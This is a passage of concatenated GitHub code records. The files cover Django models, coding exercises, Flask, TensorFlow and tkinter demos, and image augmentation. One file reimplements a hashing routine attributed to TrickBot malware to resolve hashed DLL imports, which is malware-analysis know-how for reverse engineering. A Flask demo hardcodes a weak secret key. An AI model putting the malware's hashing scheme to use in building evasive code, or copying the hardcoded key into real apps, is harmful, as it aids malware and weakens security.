__str__(self):\n\t\treturn self.ovawp\n\nclass PartyOvawp(models.Model):\n\tpartyname = models.ForeignKey(Party, on_delete=models.CASCADE)\n\tovawp = models.CharField(max_length=128)\n\tpercentage = models.IntegerField(default=0) \n\n\tclass Meta:\n\t\tverbose_name_plural = \"Party ovawp\"\n\t\tunique_together = ('partyname','ovawp')\n\n\tdef __str__(self):\n\t\treturn self.ovawp\n\nclass AgeOvawp(models.Model):\n\tagegroup = models.ForeignKey(AgeBracket, on_delete=models.CASCADE)\n\tovawp = models.CharField(max_length=128)\n\tpercentage = models.IntegerField(default=0)\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Age ovawp\"\n\t\tunique_together = ('agegroup','ovawp')\n\n\tdef __str__(self):\n\t\treturn self.ovawp\n\t\nclass SocialMediaOvawp(models.Model):\n\tplatformuse = models.ForeignKey(PlatformUse, on_delete=models.CASCADE)\n\tovawp = models.CharField(max_length=128)\n\tpercentage = models.IntegerField(default=0)\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Social Media ovawp\"\n\t\tunique_together = ('platformuse','ovawp')\n\n\tdef __str__(self):\n\t\treturn self.ovawp\n","repo_name":"frankTheCodeBoy/PollicyDashboard","sub_path":"pollicy_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13694178584","text":"from dword import DWORD as dword\nfrom hash_lookup import get_dll_hashes\n\nx = 0xca895f6e\ny = 0x3576a091\n\ndef compute_hash(data):\n\tres = dword(0)\n\tfor b in data:\n\t\tres = ((res + b) * 0x401)\n\t\t_temp = res\n\t\tres = (res >> 6) ^ _temp\n\tres *= 9\n\t_temp = res\n\tres >>= 0xb\n\tres ^= _temp\n\tres *= 0x8001\n\treturn (res & x) | ((~res) & y)\n\nlookup_table = get_dll_hashes(compute_hash)\n","repo_name":"jacobbello/python-malware-tools","sub_path":"trickbot_hash.py","file_name":"trickbot_hash.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40280586457","text":"__author__ = 'Michael'\n\n# Implement a MyQueue class which implements a queue using two stacks.\n\n\nclass MyQueue:\n def __init__(self):\n self.a = Stack()\n self.b = Stack()\n\n def __str__(self):\n while self.a.count > 0:\n self.b.push(self.b.pop())\n\n return str(self.b)\n\n def count(self):\n return self.a.count + self.b.count\n\n def enqueue(self, value):\n while self.a.count > 0:\n self.b.push(self.a.pop())\n\n self.b.push(value)\n\n def dequeue(self):\n while self.b.count > 0:\n self.a.push(self.b.pop())\n\n return self.a.pop()\n\n\nclass Stack:\n def __init__(self):\n self.head = None\n self.tail = None\n self.count = 0\n\n def __str__(self):\n node = self.head.next\n temp = \"[\" + str(self.head.data) + \"]\"\n\n while node is not None:\n temp += \"->[\" + str(node) + \"]\"\n node = node.next\n\n return temp\n\n def count(self):\n return self.count\n\n def push(self, value):\n node = Node(value)\n\n if self.head is None:\n self.head = node\n self.tail = node\n else:\n self.head.previous = node\n node.next = self.head\n self.head = node\n\n self.count += 1\n\n def pop(self):\n if self.head is None:\n return None\n\n node = self.head\n self.head = node.next\n\n if self.head is None:\n self.tail = None\n else:\n self.head.previous = None\n\n self.count -= 1\n\n return node.data\n\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.previous = None\n self.next = None\n\n def __str__(self):\n return str(self.data)\n\n\ndef main():\n test_queue = setup_test_queue()\n print(test_queue)\n\n print(test_queue.dequeue())\n print(test_queue.dequeue())\n print(test_queue.dequeue())\n print(test_queue.dequeue())\n (test_queue.enqueue(\"A\"))\n (test_queue.enqueue(\"P\"))\n print(test_queue)\n\n\ndef setup_test_queue():\n queue = MyQueue()\n\n for x in range(12):\n queue.enqueue(x % 7)\n\n return queue\n\n\nif __name__ == '__main__':\n main()","repo_name":"Ampersandnz/InterviewPrep","sub_path":"3 - Stacks & Queues/3.5/3.5.py","file_name":"3.5.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15067894249","text":"A,B,C = map(int,input().split())\r\n\r\namaris = []\r\n\r\nflag = False\r\ncount = 1\r\ntmp = A\r\nwhile True:\r\n amari = tmp % B\r\n if C == amari:\r\n flag = True\r\n break\r\n if amari in amaris:\r\n break\r\n amaris.append(amari)\r\n count += 1\r\n tmp = A * count\r\n\r\nif flag:\r\n print(\"YES\")\r\nelse:\r\n print(\"NO\")","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc060/B/4911627.py","file_name":"4911627.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"8212179078","text":"import unittest\n\nfrom lib.cell_tracking.track_data import TrackData\nimport lib.cell_tracking.track_data as track_data\nfrom lib.cell_tracking import cell_dimensions\nfrom lib.cell_tracking import cell_tracker\n\nimport networkx as nx\n\nclass TrackDataTest(unittest.TestCase): \n def test_final_decentants(self):\n test_tree = [(0, 1), (0, 4), (1, 2), (1,5), (2,14), (1,3), (4,6), (5,8), (5,7), (7,9), (7,10), (7, 11), (11, 12), (11,13)]\n tree = nx.DiGraph()\n for p, c in test_tree:\n tree.add_edge(p, c)\n #nx.draw_networkx(tree, pos=track_data.hierarchy_pos(tree,0), with_labels=True)\n #plt.show()\n final = track_data.get_final_decendents(tree, 5)\n self.assertEqual(final, [8, 9, 10, 12, 13])\n\n\n def test_time_parser(self):\n tests = [(1, 31, \"1h31m\"), (None, 14, \"14m\"), (4, None, \"04h\"), (3,0, \"3h0m\")]\n\n for hour, mins, time_string in tests:\n mins = 0 if mins is None else mins\n hour = 0 if hour is None else hour\n ans = hour*60 + mins \n test = track_data.parse_time(time_string)\n self.assertAlmostEqual(ans, test)\n \nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"npmurphy/biofilm_pulse","sub_path":"tests/track_data.test.py","file_name":"track_data.test.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27741078918","text":"from flask import Flask, session, redirect\n\napp = Flask(__name__)\napp.secret_key = 'allo'\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello {}!'.format(session.get('name', 'Guest'))\n\n\n@app.route('/name/')\ndef set_name(name):\n session['name'] = name\n return redirect('/')\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"profdenis/trans-web-app","sub_path":"05_flask_sessions/01_app.py","file_name":"01_app.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"42296386377","text":"from config import *\nimport tensorflow as tf\nimport numpy as np\nimport os, math\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\ndef sigmoid_threshold(feature, alpha, w):\n with tf.variable_scope('sigmoid_threshold'):\n return tf.nn.sigmoid(-w *(feature - alpha))\n\n\ndef activation_func(z, activation='leaky_relu'):\n if activation == 'leaky_relu':\n return tf.nn.leaky_relu(z)\n elif activation == 'relu':\n return tf.nn.relu(z)\n elif activation == 'selu':\n return tf.nn.selu(z)\n elif activation == 'tanh':\n return tf.nn.tanh(z)\n elif activation == 'sigmoid':\n return tf.nn.sigmoid(z)\n elif activation == 'linear':\n return z\n\n assert False, 'Activation Func \"{}\" not Found'.format(activation)\n\n\ndef get_weight(shape, gain=np.sqrt(2), use_wscale=False, fan_in=None):\n if fan_in is None: fan_in = np.prod(shape[:-1])\n std = gain / np.sqrt(fan_in)\n\n if use_wscale:\n wscale = tf.constant(np.float32(std), name='wscale')\n return tf.get_variable('weight', shape=shape, initializer=tf.initializers.random_normal()) * wscale\n else:\n return tf.get_variable('weight', shape=shape, initializer=tf.initializers.random_normal(0, std))\n\n\ndef dense(z, units, activation=None, name='Dense', gain=np.sqrt(2)/4, use_PN=False):\n with tf.variable_scope(name):\n with tf.device(\"/device:{}:0\".format(controller)):\n assert len(z.shape) == 2, 'Input Dimension must be rank 2, but is rank {}'.format(len(z.shape))\n initializer = tf.contrib.layers.variance_scaling_initializer(dtype=tf.float32, factor=gain)\n weights = get_weight([z.shape[1].value, units], gain, use_wscale=True)\n biases = tf.get_variable('bias', [units], initializer=initializer)\n\n y = tf.add(tf.matmul(z, weights), biases)\n\n if activation:\n y= activation_func(y, activation)\n\n if use_PN:\n y = PN(y)\n\n return y\n\n\ndef conv2d(input_vol, input_dim, num_kernal, scope, kernal_size=3, stride=1, activation='leaky_relu', padding='SAME', batch_norm=False, gain=np.sqrt(2), use_PN=False):\n with tf.variable_scope(scope):\n if isinstance(kernal_size, int):\n kernal_height = kernal_size\n kernal_width = kernal_size\n else:\n kernal_height = kernal_size[0]\n kernal_width = kernal_size[1]\n\n with tf.device(\"/device:{}:0\".format(controller)):\n initializer = tf.contrib.layers.variance_scaling_initializer(dtype=tf.float32, factor=gain)\n weights = get_weight([kernal_height, kernal_width, int(input_vol.shape[-1]), int(num_kernal)], gain, use_wscale=True)\n biases = tf.get_variable('bias', [int(num_kernal)], initializer=initializer)\n\n conv = tf.add(tf.nn.conv2d(input_vol, weights, [1, stride, stride, 1], padding=padding), biases)\n\n if batch_norm:\n conv = tf.layers.batch_normalization(conv, training=True)\n\n out = activation_func(conv, activation)\n\n if use_PN:\n out = PN(out)\n\n return out\n\n\ndef get_z(batch_size, z_length):\n with tf.variable_scope('z'):\n z = tf.random_normal(shape=[batch_size, z_length], mean=0, stddev=1, name='random_z')\n\n return z\n","repo_name":"johnryh/GAIN_Implementation","sub_path":"network_utility.py","file_name":"network_utility.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"3290167716","text":"# -*- coding: utf-8\r\n#\r\n# Программа к учебному пособию\r\n# К.Ю. Поляков. Программирование на языках Python и C++\r\n# Часть 2 (9 класс)\r\n# Программа № 21. Генераторы списков\r\n#\r\n\r\nN = 10\r\nA = [i for i in range(N)]\r\nprint(A)\r\n\r\nA = list(range(N))\r\nprint(A)\r\n\r\nA = [i*i for i in range(N)]\r\nprint(A)\r\n\r\nA = [i for i in range(100)\r\n if i % 7 == 0]\r\nprint(A)\r\n\r\nA = [i for i in range(100)\r\n if i % 7 == 0 and i % 10 == 1]\r\nprint(A)\r\n","repo_name":"olgaObnosova/EGE","sub_path":"9prog_python/21-arrays-gen.py","file_name":"21-arrays-gen.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17418198361","text":"# example\nimport tensorflow as tf\nfrom alexnet_inference import conv_net\nimport os\nimport sys\nimport numpy as np\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom natsort import natsorted\nBATCH_SIZE = 1\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\nMODEL_SAVE_PATH = \"model_svhn9/\"\nimgPath = \"../datasets/svhn/mchar_test_a\"\n\n\nx = tf.placeholder(tf.float32, [None, 224, 224])\n\n# def read_and_decode(tfrecords_file, batch_size):\n# \"\"\"\n# val tfrecord is right\n# :param tfrecords_file:\n# :param batch_size:\n# :return:\n# \"\"\"\n# filename_queue = tf.train.string_input_producer([tfrecords_file])\n# reader = tf.TFRecordReader()\n# _, serialized_example = reader.read(filename_queue)\n# img_features = tf.parse_single_example(serialized_example,\n# features={\n# 'label0': tf.FixedLenFeature([], tf.int64),\n# 'label1': tf.FixedLenFeature([], tf.int64),\n# 'label2': tf.FixedLenFeature([], tf.int64),\n# 'label3': tf.FixedLenFeature([], tf.int64),\n# 'image': tf.FixedLenFeature([], tf.string),\n# })\n# image = tf.decode_raw(img_features['image'], tf.uint8)\n# image = tf.reshape(image, [224, 224])\n# image = tf.cast(image, tf.float32) * (1. / 255) # 在流中抛出img张量\n# # length = tf.cast(img_features['length'], tf.int32)\n# label0 = tf.cast(img_features['label0'], tf.int32)\n# label1 = tf.cast(img_features['label1'], tf.int32)\n# label2 = tf.cast(img_features['label2'], tf.int32)\n# label3 = tf.cast(img_features['label3'], tf.int32)\n#\n# image_batch, label_batch0, label_batch1, label_batch2, label_batch3 = \\\n# tf.train.batch([image, label0, label1, label2, label3],\n# batch_size=batch_size,\n# num_threads=2,\n# capacity=32)\n# # length_batch = tf.reshape(length_batch, [batch_size])\n# label_batch0 = tf.reshape(label_batch0, [batch_size])\n# label_batch1 = tf.reshape(label_batch1, [batch_size])\n# label_batch2 = tf.reshape(label_batch2, [batch_size])\n# label_batch3 = tf.reshape(label_batch3, [batch_size])\n#\n# print(\"Read tfrecord doc done!\")\n# return image_batch, label_batch0, label_batch1, label_batch2, label_batch3\n\n\ndef read_and_decode(filename):\n # 根据文件名生成一个队列\n filename_queue = tf.train.string_input_producer([filename])\n reader = tf.TFRecordReader()\n # 返回文件名和文件\n _, serialized_example = reader.read(filename_queue)\n features = tf.parse_single_example(serialized_example,\n features={\n 'img_raw': tf.FixedLenFeature([], tf.string),\n 'label0': tf.FixedLenFeature([], tf.int64),\n 'label1': tf.FixedLenFeature([], tf.int64),\n 'label2': tf.FixedLenFeature([], tf.int64),\n 'label3': tf.FixedLenFeature([], tf.int64),\n })\n # 获取图片数据\n image = tf.decode_raw(features['img_raw'], tf.uint8)\n # 没有经过预处理的灰度图\n image_raw = tf.reshape(image, [224, 224])\n # tf.train.shuffle_batch必须确定shape\n image = tf.reshape(image, [224, 224])\n # 图片预处理\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.subtract(image, 0.5)\n image = tf.multiply(image, 2.0)\n # 获取label\n label0 = tf.cast(features['label0'], tf.int32)\n label1 = tf.cast(features['label1'], tf.int32)\n label2 = tf.cast(features['label2'], tf.int32)\n label3 = tf.cast(features['label3'], tf.int32)\n\n return image, image_raw, label0, label1, label2, label3\n\n\nimage, image_raw, label0, label1, label2, label3 = read_and_decode(\"valData_4_digit_nolen.tfrecord\")\n\n# 使用shuffle_batch可以随机打乱\nimage_batch, image_raw_batch, label_batch0, label_batch1, label_batch2, label_batch3 = tf.train.shuffle_batch(\n [image, image_raw, label0, label1, label2, label3], batch_size=BATCH_SIZE,\n capacity=50000, min_after_dequeue=10000, num_threads=1)\n\n\ndef plot_images(images, label0, label1, label2, label3, label4):\n for i in np.arange(0, 16):\n plt.subplot(4, 4, i + 1)\n plt.axis('off')\n title = str(label0[i]) + str(label1[i]) + str(label2[i]) + str(label3[i]) + str(label4[i])\n plt.title(title, fontsize=10)\n plt.subplots_adjust(wspace=0.5, hspace=0.5)\n plt.imshow(images[i])\n plt.savefig('./name.jpg')\n plt.show()\n\n\nwith tf.Session() as sess:\n # inputs: a tensor of size [batch_size, height, width, channels]\n X = tf.reshape(x, [BATCH_SIZE, 224, 224, 1])\n # 数据输入网络得到输出值\n logits0, logits1, logits2, logits3 = conv_net(X, 11, 0.2, reuse=False, is_training=False)\n\n # 预测值\n predict0 = tf.reshape(logits0, [-1, 11])\n correct_prediction0 = tf.argmax(predict0, 1)\n\n predict1 = tf.reshape(logits1, [-1, 11])\n correct_prediction1 = tf.argmax(predict1, 1)\n\n predict2 = tf.reshape(logits2, [-1, 11])\n correct_prediction2 = tf.argmax(predict2, 1)\n\n predict3 = tf.reshape(logits3, [-1, 11])\n correct_prediction3 = tf.argmax(predict3, 1)\n\n # correct_prediction0 = tf.argmax(logits0, 1)\n # correct_prediction1 = tf.argmax(logits1, 1)\n # correct_prediction2 = tf.argmax(logits2, 1)\n # correct_prediction3 = tf.argmax(logits3, 1)\n\n # 初始化\n sess.run(tf.global_variables_initializer())\n # 载入训练好的模型\n saver = tf.train.Saver()\n ckpt = tf.train.get_checkpoint_state(MODEL_SAVE_PATH)\n\n saver.restore(sess, ckpt.model_checkpoint_path)\n # saver.restore(sess, './model_svhn7/model10000.ckpt.data-00000-of-00001')\n\n # 创建一个协调器,管理线程\n coord = tf.train.Coordinator()\n # 启动QueueRunner, 此时文件名队列已经进队\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n for i in range(20):\n # 获取一个批次的数据和标签\n b_image, b_image_raw, b_label0, b_label1, b_label2, b_label3 = sess.run([image_batch,\n image_raw_batch,\n label_batch0,\n label_batch1,\n label_batch2,\n label_batch3])\n # 显示图片\n img = Image.fromarray(b_image_raw[0], 'L')\n plt.imshow(img)\n plt.axis('off')\n plt.show()\n # 打印标签\n print('label:', b_label0, b_label1, b_label2, b_label3)\n # 预测\n label0, label1, label2, label3 = sess.run([correct_prediction0,\n correct_prediction1,\n correct_prediction2,\n correct_prediction3], feed_dict={x: b_image})\n # 打印预测值\n print('predict:', label0, label1, label2, label3)\n\n # 通知其他线程关闭\n coord.request_stop()\n # 其他所有线程关闭之后,这一函数才能返回\n coord.join(threads)\n","repo_name":"bruce1408/Tensorflow_learning","sub_path":"week10/src/10_7_predict.py","file_name":"10_7_predict.py","file_ext":"py","file_size_in_byte":7778,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"39963553820","text":"lst = []\nsortlst = []\nfor i in range(1,11):\n lst.append(i)\n\nprint(\"Original list:\\n\",lst)\nfor i in lst:\n for j in lst:\n if(i+j==12):\n if([j,i] not in sortlst):\n sortlst.append([i,j])\n\nprint(\"Set of number whose sum equals 12: \\n\",sortlst)","repo_name":"mht009/Programs","sub_path":"HackerRank/Sort.py","file_name":"Sort.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69957534634","text":"class Solution:\n def addBinary(self, a: str, b: str) -> str:\n max_len = max(len(a), len(b))\n a = a.zfill(max_len)\n b = b.zfill(max_len)\n \n result = ''\n carry = 0 \n \n \n for i in range(max_len - 1, -1, -1):\n r = carry\n r += 1 if a[i] == '1' else 0\n r += 1 if b[i] == '1' else 0 \n \n result = ('1' if r % 2 == 1 else '0') + result\n \n carry = 0 if r < 2 else 1 \n \n if carry != 0 : result = '1' + result\n return result \n \n \nsolve = Solution()\nprint(solve.addBinary(\"1\", \"1\"))\n\n# Đề bài: cho 2 chuỗi binary yêu cầu cộng 2 chuỗi đó lại với nhau \n# Hàm zfill(width) nó sẽ padding 0 vào phía bên trái cho đến khi chuỗi đó có độ dài bằng width\n","repo_name":"d47sec/LearnCode","sub_path":"LeetCode/DataStructure/Array/add_binary.py","file_name":"add_binary.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14809923429","text":"import torch\n\nfrom torch.testing._internal.common_device_type import get_all_device_types\n\nimport operator_benchmark as op_bench\n\n\"\"\"Microbenchmark for Fill_ operator.\"\"\"\n\nfill_short_configs = op_bench.config_list(\n attr_names=[\"N\"],\n attrs=[\n [1],\n [1024],\n [2048],\n ],\n cross_product_configs={\n \"device\": [\"cpu\", \"cuda\"],\n \"dtype\": [torch.int32],\n },\n tags=[\"short\"],\n)\n\nfill_long_configs = op_bench.cross_product_configs(\n N=[10, 1000],\n device=get_all_device_types(),\n dtype=[\n torch.bool,\n torch.int8,\n torch.uint8,\n torch.int16,\n torch.int32,\n torch.int64,\n torch.half,\n torch.float,\n torch.double,\n ],\n tags=[\"long\"],\n)\n\n\nclass Fill_Benchmark(op_bench.TorchBenchmarkBase):\n def init(self, N, device, dtype):\n self.inputs = {\"input_one\": torch.zeros(N, device=device).type(dtype)}\n self.set_module_name(\"fill_\")\n\n def forward(self, input_one):\n return input_one.fill_(10)\n\n\nop_bench.generate_pt_test(fill_short_configs + fill_long_configs, Fill_Benchmark)\n\n\nif __name__ == \"__main__\":\n op_bench.benchmark_runner.main()\n","repo_name":"pytorch/pytorch","sub_path":"benchmarks/operator_benchmark/pt/fill_test.py","file_name":"fill_test.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"2523321347","text":"# 数论\nread = input\nrn = lambda :map(int, read().split())\nm,k = rn()\nimport math\nN = 2**(m) - 1 # 0~N\nr = [i for i in range(N+1)] # 0~N\nif k > N:\n print(-1)\n# elif N == 1 and k == 0:\n# print(0, 0)\nelif N == 1 and k == 1: # 0 0, k = 0\n print('-1')\nelif k == 0:\n for i in r:\n print(i, end=' ')\n r.reverse()\n for i in r:\n print(i, end=' ')\nelif N == 2 and k == 1: # 0 xor 1 = 1, n = 1\n print(-1)\nelse: # 0 xor 1 xor 2 ... xor 2^m - 1 = 0, n > 1, that is k = 0 xor 1 xor 2 xor k - 1 xor k + 1 ... xor 2^m - 1, k <= 2^m - 1\n for i in r:\n if i == k:continue\n print(i, end=' ')\n print(k, end=' ')\n r.reverse()\n for i in r:\n if i == k:continue\n print(i, end=' ')\n print(k, end=' ')\n \n","repo_name":"xsthunder/acm","sub_path":"at/abc126/f.py","file_name":"f.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23537899941","text":"# this will demonstrate using simple buttons in a GUI\nimport tkinter\nimport tkinter.font as tkfont\n\n\n# set up the class\nclass ButtonWars:\n\t# set up the GUI in the init\n\tdef __init__(self):\n\t\t# first create an instance of Tk()\n\t\t# -- to initialize access to the library of tkinter widgets (classes)\n\t\t# -- and provide a master GUI window\n\t\tself.main_window = tkinter.Tk()\n\t\t# there are many options not included in your book, e.g. title\n\t\tself.main_window.title(\"Button Wars\")\n\t\t# this sets a new size for the default font for better visibility\n\t\t# not required for your projects, but helpful in the classroom\n\t\tdefault_font = tkfont.nametofont(\"TkDefaultFont\")\n\t\tdefault_font.configure(size=24)\n\n\t\t# add a couple of Frames to help organize the contents in the main_window\n\t\t# for those who know HTML, Frames are similar to divs\n\t\tself.frame_top = tkinter.Frame(self.main_window)\n\t\tself.frame_bottom = tkinter.Frame(self.main_window)\n\n\t\t# add a Label to the top frame. It will be used to display a message\n\t\t# so, we assign a string variable (StringVar) to the Label using textvariable\n\t\t# -- the variable provides a getter and setter to get and set the text\n\t\t# -- if no starting text is specified, it starts with an empty string\n\t\tself.message = tkinter.StringVar()\n\t\tself.message_area = tkinter.Label(self.frame_top, textvariable=self.message, width=20)\n\n\t\t# pack the label into its parent container (the top frame)\n\t\tself.message_area.pack()\n\n\t\t# add buttons to the bottom frame -- the text displays on the button itself\n\t\t# the command option assigns a method to be called when the button is pressed\n\t\tself.me_button = tkinter.Button(self.frame_bottom, text=\"Push Me!\", command=self.push_me)\n\t\tself.no_me_button = tkinter.Button(self.frame_bottom, text=\"No! Push Me!\", command=self.no_push_me)\n\t\t# this quit button calls a built-in method to destroy the window -- and end the mainloop()\n\t\tself.quit_button = tkinter.Button(self.frame_bottom, text=\"Give Up\", command=self.main_window.destroy)\n\n\n\t\t# pack the buttons into their containers -- default side is TOP\n\t\tself.me_button.pack()\n\t\tself.no_me_button.pack()\n\t\tself.quit_button.pack()\n\n\t\t# pack the frames in order from top to bottom -- default side is TOP\n\t\tself.frame_top.pack()\n\t\tself.frame_bottom.pack()\n\n\t\t# initiate the listening loop\n\t\t# remember, this is essentially an infinite loop that \"listens\" for events to occur\n\t\t# it will not exit until the quit_button command calls destroy on the main_window\n\t\ttkinter.mainloop()\n\n\t# define a method to be called for the me_button\n\tdef push_me(self):\n\t\tif self.message.get() == \"\":\n\t\t\tself.message.set(\"Wise choice!\")\n\t\telse:\n\t\t\tself.message.set(\"That's what you think!\")\n\n\t# define a method to be called for the no_me_button\n\tdef no_push_me(self):\n\t\tself.message.set(\"Haha! I win!\")\n\n\ndef main():\n\t# When I instantiate the ButtonWars class, all of the GUI objects in it will be instantiated\n\t# -- and mainloop() will be called.\n\t# Once mainloop() is called, the program waits for an event\n\t# -- (a button press, keystroke, mouse click, etc.)\n\t# -- and the relevant object is notified to handle the event.\n\t# Most of the events are handled automatically by the built-in code associated with the tkinter\n\t# -- library of objects. For example, you do not have to write the code that allows you to\n\t# -- type text into an Entry box.\n\t# For this course, you will be providing code for actions like button clicks.\n\n\t# since the GUI does all the work, I just need to instantiate the GUI\n\tbutton_wars = ButtonWars()\n\n\nmain()\n","repo_name":"devingrischow/school_year_2021","sub_path":"Python_2021/prg/PycharmProjects/Demos/Demo_M13_GUI_Buttons.py","file_name":"Demo_M13_GUI_Buttons.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15140578049","text":"import sys\r\ninput=sys.stdin.readline\r\nfrom itertools import accumulate\r\nsys.setrecursionlimit(10**9)\r\nmod=10**9+7\r\nn=int(input())\r\nA=list(map(int,input().split()))\r\nS=list(accumulate([pow(i,mod-2,mod) for i in range(1,n+1)]))\r\nans=0\r\nnum=1\r\nfor i in range(2,n+1):\r\n num=num*i%mod\r\nfor i in range(n):\r\n ans+=A[i]*(S[i]+S[n-1-i]-1)%mod\r\nans=ans*num%mod\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc028/B/4506706.py","file_name":"4506706.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"489947836","text":"from Tkinter import *\n\nhome = Tk()\n\nhome.title(\"programa\")\n\nhome[\"background\"]=\"blue\"\n# backgraund = bg\n\n#largura x altura + a distancia da esquerda do monitor em que\n#a janela sera upada + a distancia do topo do monitor em que sera upada\n#LxA+E+T\n# mediada em pixel\nhome.geometry(\"500x400+300+100\")\nhome.mainloop()","repo_name":"gilberto-009199/MyPython","sub_path":"tkinter/janela principal.py","file_name":"janela principal.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20657725095","text":"import cv2\nimport numpy as np\n\n\nclass DataSample(object):\n\n def __init__(self, image, bb_boxes):\n self.image = image\n self.bb_boxes = bb_boxes\n\n def resize(self, new_size):\n img_size = np.shape(self.image)\n self.image = cv2.resize(self.image, new_size)\n img_size_post = np.shape(self.image)\n self.bb_boxes['xmin'] = np.round(self.bb_boxes['xmin'] * img_size_post[1] / img_size[1])\n self.bb_boxes['xmax'] = np.round(self.bb_boxes['xmax'] * img_size_post[1] / img_size[1])\n self.bb_boxes['ymin'] = np.round(self.bb_boxes['ymin'] * img_size_post[0] / img_size[0])\n self.bb_boxes['ymax'] = np.round(self.bb_boxes['ymax'] * img_size_post[0] / img_size[0])\n self.bb_boxes['Area'] = (self.bb_boxes['xmax'] - self.bb_boxes['xmin']) * (self.bb_boxes['ymax'] - self.bb_boxes['ymin'])\n\n def merged_mask(self):\n img = self.image\n bb_boxes = self.bb_boxes\n img_mask = np.zeros_like(img[:, :, 0])\n for i in range(len(bb_boxes)):\n # plot_bbox(bb_boxes,i,'g')\n bb_box_i = [bb_boxes.iloc[i]['xmin'], bb_boxes.iloc[i]['ymin'],\n bb_boxes.iloc[i]['xmax'], bb_boxes.iloc[i]['ymax']]\n img_mask[bb_box_i[1]:bb_box_i[3], bb_box_i[0]:bb_box_i[2]] = 1\n img_mask = np.reshape(img_mask, (np.shape(img_mask)[0], np.shape(img_mask)[1], 1))\n return img_mask\n\n def translate(self, translation_range):\n # Translation augmentation\n bb_boxes_f = self.bb_boxes\n image = self.image\n\n tr_x = translation_range*np.random.uniform()-translation_range/2\n tr_y = translation_range*np.random.uniform()-translation_range/2\n\n trans_m = np.float32([[1, 0, tr_x], [0, 1, tr_y]])\n rows, cols, channels = image.shape\n bb_boxes_f['xmin'] += tr_x\n bb_boxes_f['xmax'] += tr_x\n bb_boxes_f['ymin'] += tr_y\n bb_boxes_f['ymax'] += tr_y\n\n self.image = cv2.warpAffine(image, trans_m, (cols, rows))\n\n def stretch(self, scale_range):\n # Stretching augmentation\n img = self.image\n bb_boxes_f = self.bb_boxes\n # bb_boxes_f = bb_boxes_f.copy(deep=True)\n\n tr_x1 = scale_range*np.random.uniform()\n tr_y1 = scale_range*np.random.uniform()\n p1 = (tr_x1,tr_y1)\n tr_x2 = scale_range*np.random.uniform()\n tr_y2 = scale_range*np.random.uniform()\n p2 = (img.shape[1]-tr_x2,tr_y1)\n\n p3 = (img.shape[1]-tr_x2,img.shape[0]-tr_y2)\n p4 = (tr_x1,img.shape[0]-tr_y2)\n\n pts1 = np.float32([[p1[0],p1[1]],\n [p2[0],p2[1]],\n [p3[0],p3[1]],\n [p4[0],p4[1]]])\n pts2 = np.float32([[0,0],\n [img.shape[1],0],\n [img.shape[1],img.shape[0]],\n [0,img.shape[0]] ]\n )\n\n m = cv2.getPerspectiveTransform(pts1,pts2)\n img = cv2.warpPerspective(img, m, (img.shape[1], img.shape[0]))\n img = np.array(img, dtype=np.uint8)\n\n bb_boxes_f['xmin'] = (bb_boxes_f['xmin'] - p1[0])/(p2[0]-p1[0])*img.shape[1]\n bb_boxes_f['xmax'] = (bb_boxes_f['xmax'] - p1[0])/(p2[0]-p1[0])*img.shape[1]\n bb_boxes_f['ymin'] = (bb_boxes_f['ymin'] - p1[1])/(p3[1]-p1[1])*img.shape[0]\n bb_boxes_f['ymax'] = (bb_boxes_f['ymax'] - p1[1])/(p3[1]-p1[1])*img.shape[0]\n self.image = img\n\n def copy(self):\n return DataSample(self.image.copy(), 